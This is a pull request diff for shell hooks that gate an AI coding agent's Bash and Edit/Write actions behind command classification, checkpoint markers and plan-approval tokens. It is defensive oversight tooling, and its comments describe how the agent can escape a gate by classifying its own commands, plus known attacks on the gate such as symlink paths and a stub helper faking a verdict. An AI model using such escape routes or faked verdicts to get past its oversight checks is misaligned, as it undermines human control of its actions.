### PR TITLE
fix(agent-classifier): nonsrc_write + path verdict + agent-classifier-first novel-command routing (#351, #333)

### DIFF
--- a/hooks/checkpoint-gate.sh
+++ b/hooks/checkpoint-gate.sh
@@ -566,6 +566,35 @@ _block_pre_with_hint() {
   fi
   _block_pre
 }
+# Block variant for an UNEVALUATED novel Bash command HELD for agent
+# classification (agent-classifier-first, 2026-05-26). This is NOT a pre-
+# checkpoint requirement — the command is held until the agent classifies it —
+# so the message must NOT say "Checkpoint required" (which wrongly implies that
+# writing a pre-checkpoint is the fix and is the exact error the user kept
+# hitting on read-only/novel commands). It emits ONLY the 3-way classify hint.
+# Falls back to a generic classify message if the deny-reason lib is unavailable.
+_block_needs_classification() {
+  local hint=""
+  if [ -z "${__AGENT_DENY_REASON_SOURCED:-}" ]; then
+    if [ -f "$LIB_DIR/agent-classifier-deny-reason.sh" ]; then
+      # shellcheck disable=SC1091
+      source "$LIB_DIR/agent-classifier-deny-reason.sh"
+      __AGENT_DENY_REASON_SOURCED=1
+    else
+      __AGENT_DENY_REASON_SOURCED=0
+    fi
+  fi
+  if [ "${__AGENT_DENY_REASON_SOURCED:-0}" = "1" ]; then
+    hint="$(agent_classifier_deny_hint "$COMMAND" "$REPO_ROOT" "$CWD" "$MY_SID" 2>/dev/null)"
+  fi
+  if [ -n "$hint" ]; then
+    jq -nc --arg hint "$hint" \
+      '{decision: "block", reason: ($hint + "\n\nHook: checkpoint-gate.sh.")}'
+    exit 0
+  fi
+  jq -nc '{decision: "block", reason: "Novel command held for agent classification (it has NOT run). Classify it once (read_only / nonsrc_write / shared_write) via classifier-marker.mjs, then retry. Hook: checkpoint-gate.sh."}'
+  exit 0
+}
 # Path-aware pre-block variant (PR-B2 §11). Used by the Edit/Write pre-gate for
 # an in-repo target with no path verdict on file: leads checkpoint-first, then
 # offers the 2-way nonsrc_write path-verdict escape (classify the TARGET PATH).
@@ -1322,7 +1351,7 @@ case "$TOOL_NAME" in
       # pre-checkpoint is then required. unknown / unsafe_complex and recognized
       # write reasons (redirects, git/gh subcommands) still arm here (fail closed).
       if [ "$LABEL" = "shared_write" ] && _bash_reason_is_unevaluated_novel "$REASON"; then
-        _block_pre_with_hint
+        _block_needs_classification
       else
         _arm_checkpoint_required_if_missing
         _block_pre_with_hint

--- a/hooks/checkpoint-gate.sh
+++ b/hooks/checkpoint-gate.sh
@@ -538,6 +538,34 @@ _block_post() {
     '{decision: "block", reason: ("Post-implementation checkpoint required. Complete E2E testing and bug logging, then write the Rule 18 post-implementation checkpoint block to " + $path + " (must be non-empty) before pushing. Hook: checkpoint-gate.sh.")}'
   exit 0
 }
+# Pre-block variant that appends the 3-way agent-classifier deny-hint (#333,
+# PR-B2). Used by the Bash pre-checkpoint arm for commands that arm the gate
+# (shared_write / unsafe_complex / unknown): the message leads checkpoint-first
+# (write the Rule 18 pre-checkpoint), then offers the read_only / nonsrc_write
+# escape for a genuinely-not-repo-source command. The deny-reason lib is sourced
+# lazily; if unavailable or it emits nothing, fall back to the plain _block_pre
+# message (never fail the gate).
+_block_pre_with_hint() {
+  local hint=""
+  if [ -z "${__AGENT_DENY_REASON_SOURCED:-}" ]; then
+    if [ -f "$LIB_DIR/agent-classifier-deny-reason.sh" ]; then
+      # shellcheck disable=SC1091
+      source "$LIB_DIR/agent-classifier-deny-reason.sh"
+      __AGENT_DENY_REASON_SOURCED=1
+    else
+      __AGENT_DENY_REASON_SOURCED=0
+    fi
+  fi
+  if [ "${__AGENT_DENY_REASON_SOURCED:-0}" = "1" ]; then
+    hint="$(agent_classifier_deny_hint "$COMMAND" "$REPO_ROOT" "$CWD" "$MY_SID" 2>/dev/null)"
+  fi
+  if [ -n "$hint" ]; then
+    jq -nc --arg path "$PRE_DONE_W" --arg hint "$hint" \
+      '{decision: "block", reason: ("Checkpoint required. Write the Rule 18 pre-implementation checkpoint block to " + $path + " (must be non-empty) before write tools are unblocked.\n\n" + $hint + "\n\nHook: checkpoint-gate.sh.")}'
+    exit 0
+  fi
+  _block_pre
+}
 _block_plan_pending() {
   jq -nc --arg path "$PLAN_PENDING_W" \
     '{decision: "block", reason: ("Plan approval pending. Checkpoint marker writes are blocked while " + $path + " exists. Approve the plan first. Hook: checkpoint-gate.sh.")}'
@@ -589,6 +617,21 @@ _arm_checkpoint_required_if_missing() {
   else
     touch "$(write_marker_path "$REPO_ROOT" .checkpoint-required)" 2>/dev/null || true
   fi
+}
+
+# F1 #351 closure (PR-B2, §4): which classifier LABELS arm the Bash pre-
+# implementation checkpoint. The inversion (vs the abandoned writer-binary
+# REASON-enumeration): arm on the "writes-repo-source / can't-tell" bucket, not
+# an enumerated list. nonsrc_write / read_only / marker_write / push_or_pr_create
+# never arm here. `unknown` arms conservatively — a parsed-but-unrecognized
+# shape must fail closed (codex R1/F3). Complete by construction: anything the
+# classifier can't downgrade to nonsrc_write/read_only arms (friction, not
+# bypass); the agent downgrades it once via the deny-hint verdict.
+_bash_label_arms_pre_checkpoint() {
+  case "$1" in
+    shared_write|unsafe_complex|unknown) return 0 ;;
+    *) return 1 ;;
+  esac
 }
 
 # ---------------------------------------------------------------------------
@@ -1138,10 +1181,87 @@ case "$TOOL_NAME" in
 esac
 
 # ---------------------------------------------------------------------------
+# Bash pre-checkpoint gate (PR-B2 #351 — F1 closure via the nonsrc_write
+# inversion). A Bash command whose LABEL is in the "writes-repo-source /
+# can't-tell" bucket (shared_write / unsafe_complex / unknown) arms
+# .checkpoint-required and blocks WITH the 3-way deny-hint (#333). nonsrc_write
+# (git internals, npm install, mkdir/rmdir, em-store, /tmp redirects) and
+# read_only fall through FREE — preserving the PR #352 planning-passive win.
+# read_only already exited at the top; marker_write was handled earlier;
+# push_or_pr_create is the push-gate's job below.
+#
+# The deny-hint offers the per-instance escape: if the command does NOT write
+# repo source, the agent classifies it once (read_only / nonsrc_write) and
+# retries free; if it IS implementation, the agent writes the pre-checkpoint.
+# G1 (#351): command-classifier.sh now consults the per-session marker before
+# the escapable redirect/default_write emits, so a classified command re-
+# classifies to its agent verdict on retry and this gate no longer fires for it.
+# ---------------------------------------------------------------------------
+case "$TOOL_NAME" in
+  Bash)
+    if _bash_label_arms_pre_checkpoint "$LABEL" \
+       && ! checkpoint_marker_nonempty_for_session .pre-checkpoint-done "$MY_SID"; then
+      _arm_checkpoint_required_if_missing
+      _block_pre_with_hint
+    fi
+    ;;
+esac
+
+# ---------------------------------------------------------------------------
 # Push-gate: only fires for Bash classified as push_or_pr_create.
 # ---------------------------------------------------------------------------
 if [ "$TOOL_NAME" = "Bash" ] && [ "$LABEL" = "push_or_pr_create" ]; then
-  # Rank-2: session-aware post-checkpoint check.
+  # B1 (#351, §11b/§15-C3 — D7 backstop): push self-arms .post-checkpoint-required
+  # regardless of pre-checkpoint state, so push is an INDEPENDENT hard gate even
+  # when the pre-checkpoint was escaped via an agent verdict (D7 made the pre-
+  # checkpoint fully agent-discretionary). Without this, escaping the pre-
+  # checkpoint transitively no-ops the whole post/push/stop chain (post-req arms
+  # only if pre was armed+done; push blocks only if post-req exists; stop-gate
+  # fires only if checkpoint armed). Capture arm-if-missing's `noop` signal:
+  # noop:false ⇒ created THIS invocation ⇒ block UNCONDITIONALLY without re-
+  # reading .post-checkpoint-done (a marker created this instant cannot have a
+  # satisfied done-marker; closes the read-after-arm TOCTOU, §15-C3/F2). The
+  # cross-session sweep below is NOT weakened (load-bearing for orphan cleanup).
+  _push_self_arm_created=0
+  if ! checkpoint_marker_exists_for_session .post-checkpoint-required "$MY_SID"; then
+    ensure_primary_dir "$REPO_ROOT" 2>/dev/null || true
+    if validate_session_id "$MY_SID"; then
+      HELPER_CKM_PUSH="$HOME/.episodic-memory/scripts/checkpoint-marker.mjs"
+      if [ -f "$HELPER_CKM_PUSH" ]; then
+        # CAPTURE stdout (codex C3: the gate previously discarded it) and parse
+        # the helper's authoritative `noop` field.
+        _push_arm_out="$(CLAUDE_CODE_SESSION_ID="$MY_SID" node "$HELPER_CKM_PUSH" \
+          --target .post-checkpoint-required \
+          --action arm-if-missing \
+          --root "$REPO_ROOT" 2>/dev/null)" || true
+        case "$_push_arm_out" in
+          *'"noop":false'*|*'"noop": false'*) _push_self_arm_created=1 ;;
+        esac
+      else
+        # Fallback (helper not installed): compute existence BEFORE touch so the
+        # created-now signal is race-free (§15-C3 — no read-after-arm window).
+        _push_req_path="$(write_marker_path "$REPO_ROOT" "$(namespaced_marker_basename_for_session .post-checkpoint-required "$MY_SID")")"
+        if [ ! -e "$_push_req_path" ]; then
+          touch "$_push_req_path" 2>/dev/null || true
+          _push_self_arm_created=1
+        fi
+      fi
+    else
+      # Invalid/empty sid: legacy direct touch, existence-before-touch.
+      _push_req_path="$(write_marker_path "$REPO_ROOT" .post-checkpoint-required)"
+      if [ ! -e "$_push_req_path" ]; then
+        touch "$_push_req_path" 2>/dev/null || true
+        _push_self_arm_created=1
+      fi
+    fi
+  fi
+  if [ "$_push_self_arm_created" = "1" ]; then
+    # Created THIS invocation → cannot already have a satisfied
+    # .post-checkpoint-done. Block unconditionally without re-reading (TOCTOU-free).
+    _block_post
+  fi
+  # Rank-2: session-aware post-checkpoint check (already-armed path — a prior
+  # invocation or post-write arming armed post-req; block until it's satisfied).
   if checkpoint_marker_exists_for_session .post-checkpoint-required "$MY_SID" \
      && ! checkpoint_marker_nonempty_for_session .post-checkpoint-done "$MY_SID"; then
     _block_post

--- a/hooks/checkpoint-gate.sh
+++ b/hooks/checkpoint-gate.sh
@@ -654,23 +654,67 @@ _block_env_prefix_marker() {
 # Idempotent: no-op if the marker already exists (own-session or legacy).
 # Best-effort: never aborts the hook under set -e.
 # ---------------------------------------------------------------------------
+# ---------------------------------------------------------------------------
+# Plan-approval token helpers (checkpoint-planapproval redesign).
+#
+# `.plan-approved.<sid>` is created by `plan-marker.mjs --approve` and is the
+# ONLY thing that authorizes arming a checkpoint. It is own-session + suffixed
+# by nature (a UUID session approved a specific plan) — there is NO legacy
+# suffix-less form (the marker is new; no burn-in literal). F14 fail-closed:
+# an invalid/empty sid is never "approved", so it can never arm.
+# ---------------------------------------------------------------------------
+_plan_approved_exists_for_session() {
+  local sid="$1"
+  validate_session_id "$sid" || return 1
+  local bn
+  bn="$(namespaced_marker_basename_for_session "$PLAN_APPROVED_LEGACY_BASENAME" "$sid")"
+  [ -e "$PRIMARY_DIR/$bn" ] && return 0
+  [ -e "$LEGACY_DIR/$bn" ] && return 0
+  return 1
+}
+
+# Consume (delete) THIS session's approval token at both roots. One-shot: an
+# approval authorizes exactly one arm and can't leak into a later planning
+# phase. Best-effort under set -e. Own-session only (never the bare literal).
+_consume_plan_approved() {
+  local sid="$1"
+  validate_session_id "$sid" || return 0
+  local bn
+  bn="$(namespaced_marker_basename_for_session "$PLAN_APPROVED_LEGACY_BASENAME" "$sid")"
+  rm -f "$PRIMARY_DIR/$bn" "$LEGACY_DIR/$bn" 2>/dev/null || true
+}
+
 _arm_checkpoint_required_if_missing() {
   if checkpoint_marker_exists_for_session .checkpoint-required "$MY_SID"; then
     return 0
   fi
+  # planapproval redesign: arming is ANCHORED to plan-approval, NOT to a file-
+  # write heuristic. Do NOT arm unless THIS session has an approved-plan token.
+  # No approval → no checkpoint (NO CHECKPOINTS DURING PLANNING; and per the
+  # user decision dropping the plan-requirement block, no plan simply means no
+  # implementation gate — the write is allowed by the conditional callers).
+  if ! _plan_approved_exists_for_session "$MY_SID"; then
+    return 0
+  fi
+  # sid is valid here (the approval check requires it).
   ensure_primary_dir "$REPO_ROOT" 2>/dev/null || true
-  if validate_session_id "$MY_SID"; then
-    local helper="$HOME/.episodic-memory/scripts/checkpoint-marker.mjs"
-    if [ -f "$helper" ]; then
-      CLAUDE_CODE_SESSION_ID="$MY_SID" node "$helper" \
-        --target .checkpoint-required \
-        --action arm-if-missing \
-        --root "$REPO_ROOT" >/dev/null 2>&1 || true
-    else
-      touch "$(write_marker_path "$REPO_ROOT" "$(namespaced_marker_basename_for_session .checkpoint-required "$MY_SID")")" 2>/dev/null || true
-    fi
+  local helper="$HOME/.episodic-memory/scripts/checkpoint-marker.mjs"
+  if [ -f "$helper" ]; then
+    CLAUDE_CODE_SESSION_ID="$MY_SID" node "$helper" \
+      --target .checkpoint-required \
+      --action arm-if-missing \
+      --root "$REPO_ROOT" >/dev/null 2>&1 || true
   else
-    touch "$(write_marker_path "$REPO_ROOT" .checkpoint-required)" 2>/dev/null || true
+    touch "$(write_marker_path "$REPO_ROOT" "$(namespaced_marker_basename_for_session .checkpoint-required "$MY_SID")")" 2>/dev/null || true
+  fi
+  # Transactional consume (codex PR review P1): the arm above is best-effort
+  # (`|| true`) — an installed helper that exits non-zero would leave NO
+  # `.checkpoint-required` armed. Consume the one-shot approval token ONLY after
+  # verifying the arm actually succeeded. If arming FAILED, preserve the token so
+  # the write stays gated (callers fail closed on token-present) and a retry can
+  # arm — never consume the approval AND leave the implementation ungated.
+  if checkpoint_marker_exists_for_session .checkpoint-required "$MY_SID"; then
+    _consume_plan_approved "$MY_SID"
   fi
 }
 
@@ -1321,22 +1365,47 @@ case "$TOOL_NAME" in
        && ! checkpoint_marker_nonempty_for_session .pre-checkpoint-done "$MY_SID" \
        && _tool_call_targets_repo_source "$REPO_ROOT" "$TOOL_NAME" "$FILE_PATH" "$LABEL"; then
       # Lazy-arm ONLY when we have a concrete in-repo FILE_PATH. The empty-
-      # FILE_PATH conservative-block path (relative path with no absolute cwd
+      # FILE_PATH conservative path (relative path with no absolute cwd
       # authority — _tool_call_targets_repo_source returns 0 defensively) must
       # NOT write a marker: REPO_ROOT there falls back to the hook process cwd
       # (off-project invocation), so arming would leak .checkpoint-required
-      # into an unrelated repo. Regression: SA-cwd-strict caller-leak. The
-      # block still fires (Rule 18 conservative direction); only the arm is
-      # withheld until a real in-repo write is seen.
+      # into an unrelated repo. Regression: SA-cwd-strict caller-leak.
+      #
+      # planapproval redesign: the arm itself no-ops unless THIS session has an
+      # approved-plan token (and consumes it on arm). Block ONLY if a checkpoint
+      # is actually armed — i.e. a plan was approved (now, or earlier this
+      # implementation phase). With NO approved plan there is no checkpoint and
+      # NO block: NO CHECKPOINTS DURING PLANNING, and (per the user decision
+      # dropping finding #6) no plan ⇒ no implementation gate. The empty-
+      # FILE_PATH branch likewise only blocks when a checkpoint is already
+      # armed mid-implementation (pre-done still missing); it no longer blocks
+      # unconditionally.
       if [ -n "$FILE_PATH" ]; then
+        # Concrete in-repo path: arm (no-ops without approval; consumes the
+        # approval token only if the arm succeeded). Block if a checkpoint is
+        # armed OR an approval token is still present — the latter is the
+        # fail-closed case where arming FAILED (codex PR review P1): the token
+        # survives, so the write stays gated until a retry arms successfully.
         _arm_checkpoint_required_if_missing
-        # PR-B2 §11: in-repo target with no path verdict on file — block with
-        # the 2-way path-verdict hint (classify nonsrc_write, or write the
-        # pre-checkpoint). Empty FILE_PATH (conservative block, no arm) keeps
-        # the plain message — there is no concrete path to classify.
-        _block_pre_with_path_hint
+        if checkpoint_marker_exists_for_session .checkpoint-required "$MY_SID" \
+           || _plan_approved_exists_for_session "$MY_SID"; then
+          # PR-B2 §11: in-repo target with no path verdict on file — block with
+          # the 2-way path-verdict hint (classify nonsrc_write, or write the
+          # pre-checkpoint).
+          _block_pre_with_path_hint
+        fi
       else
-        _block_pre
+        # Empty FILE_PATH: cannot arm safely (REPO_ROOT may be a fallback cwd →
+        # arming would leak .checkpoint-required into an unrelated repo;
+        # regression SA-cwd-strict). Block to require a pre-checkpoint ONLY when
+        # implementation is sanctioned — a checkpoint is already armed OR a plan
+        # is approved this session. No approval + not armed = planning → allow.
+        # Arming defers to the pre-checkpoint write, where REPO_ROOT resolves
+        # from the absolute marker path.
+        if checkpoint_marker_exists_for_session .checkpoint-required "$MY_SID" \
+           || _plan_approved_exists_for_session "$MY_SID"; then
+          _block_pre
+        fi
       fi
     fi
     ;;
@@ -1377,10 +1446,21 @@ case "$TOOL_NAME" in
       # pre-checkpoint is then required. unknown / unsafe_complex and recognized
       # write reasons (redirects, git/gh subcommands) still arm here (fail closed).
       if [ "$LABEL" = "shared_write" ] && _bash_reason_is_unevaluated_novel "$REASON"; then
+        # Agent-classifier-first (#351): novel unevaluated command is HELD for
+        # classification regardless of plan state — this is NOT a checkpoint
+        # (it never arms) and is orthogonal to the planapproval redesign.
         _block_needs_classification
       else
+        # planapproval redesign: arm no-ops unless an approved-plan token exists
+        # (consumes it only if the arm succeeded). Block if a checkpoint is armed
+        # OR an approval token is still present — the latter is the fail-closed
+        # case where arming FAILED (codex PR review P1). No approved plan ⇒ no
+        # checkpoint ⇒ no block (NO CHECKPOINTS DURING PLANNING).
         _arm_checkpoint_required_if_missing
-        _block_pre_with_hint
+        if checkpoint_marker_exists_for_session .checkpoint-required "$MY_SID" \
+           || _plan_approved_exists_for_session "$MY_SID"; then
+          _block_pre_with_hint
+        fi
       fi
     fi
     ;;

--- a/hooks/checkpoint-gate.sh
+++ b/hooks/checkpoint-gate.sh
@@ -660,6 +660,28 @@ _bash_label_arms_pre_checkpoint() {
   esac
 }
 
+# Agent-classifier-first (2026-05-26, user design decision). The two conservative
+# shared_write REASONs the classifier emits for an UNRECOGNIZED command shape that
+# the agent classifier has NOT yet evaluated (no marker verdict):
+#   default_write     — the terminal G1 default (cp/mv/dd/curl/unknown binary,
+#                       e.g. `shasum`); command-classifier.sh:1954.
+#   interpreter_other — the interpreter Tier-1 fallback for a non-allowlisted
+#                       node/python/ruby/perl script (e.g. `node foo.mjs`);
+#                       command-classifier.sh:1939.
+# Both mean "novel command, agent verdict pending" → route to the agent classifier
+# (block + 3-way hint) WITHOUT arming .checkpoint-required. Arming a not-yet-
+# evaluated command framed read-only inspection as implementation (and left a
+# lingering marker → stop-gate deadlock). All OTHER shared_write reasons are
+# recognized writes — redirects (readonly_cmd_redirected / echo_redirected),
+# git/gh subcommands, or an agent-verdict marker hit (bash_marker_cache_hit /
+# interpreter_marker_cache_hit) — and arm conservatively as before.
+_bash_reason_is_unevaluated_novel() {
+  case "$1" in
+    default_write|interpreter_other) return 0 ;;
+    *) return 1 ;;
+  esac
+}
+
 # ---------------------------------------------------------------------------
 # Smart-arming helpers (PR fix/checkpoint-gate-smart-arming, 2026-05-24)
 #
@@ -1286,8 +1308,25 @@ case "$TOOL_NAME" in
   Bash)
     if _bash_label_arms_pre_checkpoint "$LABEL" \
        && ! checkpoint_marker_nonempty_for_session .pre-checkpoint-done "$MY_SID"; then
-      _arm_checkpoint_required_if_missing
-      _block_pre_with_hint
+      # Agent-classifier-first (2026-05-26, user design decision): an UNEVALUATED
+      # novel command — the classifier's conservative cache-miss defaults
+      # (LABEL=shared_write, REASON in {default_write, interpreter_other}, e.g.
+      # `shasum` or `node foo.mjs`) — is routed to the agent classifier (block +
+      # 3-way hint) WITHOUT arming .checkpoint-required. Arming a not-yet-
+      # evaluated command framed read-only inspection as implementation AND left
+      # a lingering .checkpoint-required that deadlocked the stop-gate. The block
+      # itself is fail-closed: the command cannot run until the agent classifies
+      # it. Arming is DEFERRED to the agent's verdict — a marker-cache hit
+      # reclassifying the command a repo-source write (a recognized reason, not
+      # default_write/interpreter_other) takes the arm branch on retry, where the
+      # pre-checkpoint is then required. unknown / unsafe_complex and recognized
+      # write reasons (redirects, git/gh subcommands) still arm here (fail closed).
+      if [ "$LABEL" = "shared_write" ] && _bash_reason_is_unevaluated_novel "$REASON"; then
+        _block_pre_with_hint
+      else
+        _arm_checkpoint_required_if_missing
+        _block_pre_with_hint
+      fi
     fi
     ;;
 esac

--- a/hooks/checkpoint-gate.sh
+++ b/hooks/checkpoint-gate.sh
@@ -847,14 +847,40 @@ _tool_call_targets_repo_source() {
   fi
   [ "$in_repo" = "0" ] || return 1
 
-  # In-repo target. Two downgrades make it NOT count as repo source (PR-B2 §11):
+  # In-repo target. Four downgrades make it NOT count as repo source (PR-B2 §11):
   #
   #  (1) .review-store/ carve-out — second-opinion review artifacts the harness
   #      stages in-project (.review-store/) are never repo source, so a review
-  #      write must never arm the pre-checkpoint.
+  #      write must never arm the pre-checkpoint. (.review-store/ is untracked
+  #      but NOT in .gitignore, so it needs its own arm independent of (1c).)
   case "$fp_canon" in
     "$repo_canon"/.review-store|"$repo_canon"/.review-store/*) return 1 ;;
   esac
+  #
+  #  (1b) .checkpoints/ carve-out — gate infrastructure (markers, classify cache,
+  #      the runbook-ack marker, and the pending command-files the command-
+  #      classification deny-hint itself tells the agent to write to
+  #      <repo>/.checkpoints/classify/pending-*.cmd) is never repo source.
+  #      Without this, that prescribed write arms the pre-checkpoint and
+  #      deadlocks the classify protocol (reproduced 2026-05-27). Marker CONTENT
+  #      validation still happens in the marker_write path; this governs ARMING
+  #      only. Canonical-anchored + kept as a hard infra invariant independent of
+  #      .gitignore drift (it ships gitignored, but the gate must never arm on
+  #      its own substrate even if a user edits .gitignore).
+  case "$fp_canon" in
+    "$repo_canon"/.checkpoints|"$repo_canon"/.checkpoints/*) return 1 ;;
+  esac
+  #
+  #  (1c) .gitignore carve-out — a gitignored target is by definition NOT tracked
+  #      repo source (covers .episodic-memory/ episodes, scratch/, analysis/,
+  #      node_modules/, .codex/, etc.). Defer to git's own notion of "source"
+  #      rather than enumerating directories — gating on an open-ended directory
+  #      list is the enumeration treadmill. Fail-closed: git absent / path
+  #      outside the worktree / not-ignored → fall through and arm conservatively.
+  if command -v git >/dev/null 2>&1 \
+     && git -C "$repo_canon" check-ignore -q -- "$fp_canon" 2>/dev/null; then
+    return 1
+  fi
   #
   #  (2) Path verdict — the agent classified THIS target nonsrc_write/read_only
   #      via classifier-marker.mjs --target-path. Verdict-over-heuristic

--- a/hooks/checkpoint-gate.sh
+++ b/hooks/checkpoint-gate.sh
@@ -566,6 +566,32 @@ _block_pre_with_hint() {
   fi
   _block_pre
 }
+# Path-aware pre-block variant (PR-B2 §11). Used by the Edit/Write pre-gate for
+# an in-repo target with no path verdict on file: leads checkpoint-first, then
+# offers the 2-way nonsrc_write path-verdict escape (classify the TARGET PATH).
+# Falls back to the plain _block_pre if the deny-reason lib OR its path-hint fn
+# is unavailable / emits nothing — never fails the gate.
+_block_pre_with_path_hint() {
+  local hint=""
+  if [ -z "${__AGENT_DENY_REASON_SOURCED:-}" ]; then
+    if [ -f "$LIB_DIR/agent-classifier-deny-reason.sh" ]; then
+      # shellcheck disable=SC1091
+      source "$LIB_DIR/agent-classifier-deny-reason.sh"
+      __AGENT_DENY_REASON_SOURCED=1
+    else
+      __AGENT_DENY_REASON_SOURCED=0
+    fi
+  fi
+  if [ "${__AGENT_DENY_REASON_SOURCED:-0}" = "1" ] && declare -F agent_classifier_path_deny_hint >/dev/null 2>&1; then
+    hint="$(agent_classifier_path_deny_hint "$FILE_PATH" "$REPO_ROOT" "$CWD" "$MY_SID" 2>/dev/null)"
+  fi
+  if [ -n "$hint" ]; then
+    jq -nc --arg path "$PRE_DONE_W" --arg hint "$hint" \
+      '{decision: "block", reason: ("Checkpoint required. Write the Rule 18 pre-implementation checkpoint block to " + $path + " (must be non-empty) before write tools are unblocked.\n\n" + $hint + "\n\nHook: checkpoint-gate.sh.")}'
+    exit 0
+  fi
+  _block_pre
+}
 _block_plan_pending() {
   jq -nc --arg path "$PLAN_PENDING_W" \
     '{decision: "block", reason: ("Plan approval pending. Checkpoint marker writes are blocked while " + $path + " exists. Approve the plan first. Hook: checkpoint-gate.sh.")}'
@@ -733,9 +759,14 @@ _tool_call_targets_repo_source() {
     # the predicate is by construction "needs the pre-block." Including
     # marker_write that wasn't approved upstream (e.g. POST_DONE write when
     # POST_REQ not armed — test 17 regression class).
+    # PR-B2 §14-F4(a): nonsrc_write joins read_only as "not repo source" for
+    # consistency with the verdict inversion. (This Bash branch is currently
+    # reached only defensively — the gate's lone caller is Edit/Write-cased —
+    # but keeping it aligned with the LABEL taxonomy avoids a latent surprise
+    # if a future caller routes Bash through this predicate.)
     case "$label" in
-      read_only) return 1 ;;
-      *)         return 0 ;;
+      read_only|nonsrc_write) return 1 ;;
+      *)                      return 0 ;;
     esac
   fi
 
@@ -748,19 +779,67 @@ _tool_call_targets_repo_source() {
 
   local repo_canon
   repo_canon="$( (cd "$repo_root" 2>/dev/null && pwd -P) || printf '%s' "$repo_root" )"
-
-  # Raw-prefix match (codex R1 attack class 3 — symlink-out author intent).
-  case "$file_path" in
-    "$repo_root"/*|"$repo_root") return 0 ;;
-  esac
-
-  # Canonical-prefix match (handles symlink-in, traversal, nonexistent leaf).
   local fp_canon
   fp_canon="$(_canonicalize_possibly_nonexistent "$file_path")"
-  case "$fp_canon" in
-    "$repo_canon"/*|"$repo_canon") return 0 ;;
-  esac
 
+  # Is the target inside the repo at all? Raw-prefix (codex R1 attack class 3 —
+  # symlink-out author intent) OR canonical-prefix (symlink-in / traversal /
+  # nonexistent leaf). Off-repo (memory, skills, settings) → not repo source.
+  local in_repo=1
+  case "$file_path" in
+    "$repo_root"/*|"$repo_root") in_repo=0 ;;
+  esac
+  if [ "$in_repo" != "0" ]; then
+    case "$fp_canon" in
+      "$repo_canon"/*|"$repo_canon") in_repo=0 ;;
+    esac
+  fi
+  [ "$in_repo" = "0" ] || return 1
+
+  # In-repo target. Two downgrades make it NOT count as repo source (PR-B2 §11):
+  #
+  #  (1) .review-store/ carve-out — second-opinion review artifacts the harness
+  #      stages in-project (.review-store/) are never repo source, so a review
+  #      write must never arm the pre-checkpoint.
+  case "$fp_canon" in
+    "$repo_canon"/.review-store|"$repo_canon"/.review-store/*) return 1 ;;
+  esac
+  #
+  #  (2) Path verdict — the agent classified THIS target nonsrc_write/read_only
+  #      via classifier-marker.mjs --target-path. Verdict-over-heuristic
+  #      inversion (de-assume the pure path heuristic): a plan/scratch/doc/
+  #      generated file the agent declares non-source does not arm.
+  if _path_verdict_downgrades "$file_path"; then
+    return 1
+  fi
+
+  return 0
+}
+
+# PR-B2 S3 (§11/§14-F4): consult the agent's path verdict for an in-repo
+# Write/Edit target. Returns 0 (downgrade — treat as NOT repo source, do not
+# arm) iff a fresh per-session marker classifies the target nonsrc_write or
+# read_only; returns 1 otherwise (no verdict / helper-absent → arm
+# conservatively, complete-by-construction). Lazily sources agent-classifier.sh
+# for agent_classify_path (guarded by function existence — command-classifier.sh
+# may have already sourced it). CLAUDE_CODE_SESSION_ID is threaded from MY_SID so
+# the read keys to the same session the agent wrote under (mirrors the gate's
+# other helper invocations, e.g. the push self-arm at the push-gate).
+_path_verdict_downgrades() {
+  local file_path="$1"
+  [ -n "$file_path" ] || return 1
+  if ! declare -F agent_classify_path >/dev/null 2>&1; then
+    if [ -f "$LIB_DIR/agent-classifier.sh" ]; then
+      # shellcheck disable=SC1091
+      source "$LIB_DIR/agent-classifier.sh"
+    fi
+  fi
+  declare -F agent_classify_path >/dev/null 2>&1 || return 1
+  local verdict
+  verdict="$(CLAUDE_CODE_SESSION_ID="$MY_SID" agent_classify_path "$file_path" "$REPO_ROOT" "$CWD" 2>/dev/null)" || return 1
+  case "$verdict" in
+    nonsrc_write|read_only) return 0 ;;
+  esac
   return 1
 }
 
@@ -1174,8 +1253,14 @@ case "$TOOL_NAME" in
       # withheld until a real in-repo write is seen.
       if [ -n "$FILE_PATH" ]; then
         _arm_checkpoint_required_if_missing
+        # PR-B2 §11: in-repo target with no path verdict on file — block with
+        # the 2-way path-verdict hint (classify nonsrc_write, or write the
+        # pre-checkpoint). Empty FILE_PATH (conservative block, no arm) keeps
+        # the plain message — there is no concrete path to classify.
+        _block_pre_with_path_hint
+      else
+        _block_pre
       fi
-      _block_pre
     fi
     ;;
 esac

--- a/hooks/lib/agent-classifier-deny-reason.sh
+++ b/hooks/lib/agent-classifier-deny-reason.sh
@@ -1,0 +1,99 @@
+#!/usr/bin/env bash
+# episodic-memory-hook-version: 2026-05-26.1
+# agent-classifier-deny-reason.sh — compose the deny-with-hint message shown
+# when a Bash command arms the Rule 18 pre-implementation checkpoint
+# (LABEL ∈ {shared_write, unsafe_complex, unknown}) and no agent-classifier
+# verdict is on file. Closes #333; supports the #351 nonsrc_write inversion.
+#
+# 3-WAY hint (PR-B2): the message leads checkpoint-first, then offers the agent
+# a per-instance escape it classifies ONCE:
+#   1. read_only      — the command genuinely writes nothing (outside /tmp/stdout).
+#   2. nonsrc_write    — it writes, but NOT repo source (git internals, package
+#                        installs, mkdir/rmdir, redirect to /tmp, episode store).
+#   3. (repo-source write) — it IS implementation: write the pre-checkpoint above.
+#
+# Cross-platform contract (§15, codex R2/R4 REINFORCED): the escape is emitted
+# as a COMMAND-FILE flow, NOT a shell-shaped `cd '<repo>' && node …` one-liner.
+# Receiving harnesses (Cursor/Codex/Windsurf) may run Windows cmd/PowerShell
+# where `&&`, single-quote escaping, and `cd`-chaining are not portable. The
+# helper instead instructs: (a) write the command verbatim to a .cmd file under
+# the repo, (b) from the repo root, run classifier-marker.mjs with
+# --command-file. classifier-marker.mjs refuses when
+# resolveRepoRoot(process.cwd()) != --project-root, so "from the repo root" is
+# load-bearing — but it is expressed as a precondition, not a bash cd-chain.
+#
+# Helper resolution is hard-bound to installed-runtime OR repo-source — NO
+# env-var override seam (PR #271 attack class: an ambient path could point the
+# agent at a stub that fabricates a {"status":"hit"} response).
+#
+# Sourced lazily by checkpoint-gate.sh's _block_pre_with_hint. Provides:
+#   agent_classifier_deny_hint <command> <repo_root> <caller_cwd> <session_id>
+#       echoes the multi-line hint on stdout (the gate embeds it via jq --arg).
+
+# Hard-bound helper resolution: installed runtime first, repo-source fallback,
+# bare basename last (agent resolves via its own runtime). Mirrors
+# __agent_classifier_resolve_marker_helper in agent-classifier.sh.
+__agent_classifier_deny_resolve_helper() {
+  local global="$HOME/.episodic-memory/scripts/classifier-marker.mjs"
+  if [ -f "$global" ]; then printf '%s' "$global"; return 0; fi
+  local self_dir
